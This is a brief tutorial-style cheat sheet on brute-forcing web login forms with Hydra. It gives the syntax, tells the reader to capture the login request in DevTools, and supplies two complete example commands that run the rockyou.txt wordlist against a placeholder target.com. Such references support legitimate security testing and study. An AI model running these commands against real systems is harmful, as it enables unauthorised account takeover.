Hydra

Web Login Brute-Force

Syntax:

hydra -l USERNAME -P WORDLIST TARGET PROTOCOL "PATH:POST-DATA:FAILURE-CONDITION" -t THREADS

• -l USERNAME → Known username (or none if only password field exists)

• -P WORDLIST → Path to password list

• TARGET → Domain or IP

• PROTOCOL → http-post-form or https-post-form

• PATH → Login endpoint

• POST-DATA → Form parameters with ^PASS^ placeholder

• FAILURE-CONDITION → F=error message or S=success message

• -t 64 → Threads (adjust based on target)

Capture the login POST request via Browser DevTools (F12 → Network)

Extract the following inputs for Hydra

• Target URL: The specific form action endpoint.

• Parameters: The field names required to inject ^USER^ and ^PASS^.

• Fail String: The exact error message text.

Password-only form Example

hydra -l none -P rockyou.txt target.com https-post-form "/db/index.php:password=^PASS^&login=Submit:F=Invalid password" -t 64

Username + Password form:

hydra -l admin -P rockyou.txt target.com http-post-form "/login.php:username=admin&password=^PASS^:F=Invalid Password" -t 64